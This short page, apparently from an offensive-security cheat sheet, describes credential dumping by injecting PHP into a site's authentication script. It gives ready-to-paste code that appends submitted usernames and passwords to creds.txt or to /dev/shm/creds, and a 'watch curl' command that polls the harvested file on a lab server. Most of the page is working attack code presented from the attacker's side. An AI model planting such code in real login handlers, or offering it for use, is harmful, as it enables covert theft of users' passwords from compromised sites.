Credential Dumping
File-based Credentials Dumping via PHP Injection
This technique involves modifying any authentication-handling PHP file to log user credentials to a file on the server.
Add the next line after
<?php:
file_put_contents("creds.txt", $_POST['log']." - ".$_POST['pwd'], FILE_APPEND);The attacker can continuously check the
creds.txtfile for new data using a command like this:
watch -n 1 curl -s -X GET http://10.10.10.78/dev_wiki/creds.txtMemory-based Credentials Dumping via PHP Injection
This method involves injecting PHP code into an authentication PHP script to capture login credentials and write them to a temporary memory file (/dev/shm).
The following code to capture the
$_REQUESTdata (which includes the$_POSTdata from the login form) and write it to a file:
<?php
$rrr = print_r($_REQUEST, true);
$fff = fopen("/dev/shm/creds", "a");
fwrite($fff, $rrr);
fclose($fff);Just cat the file:
cat credsLast updated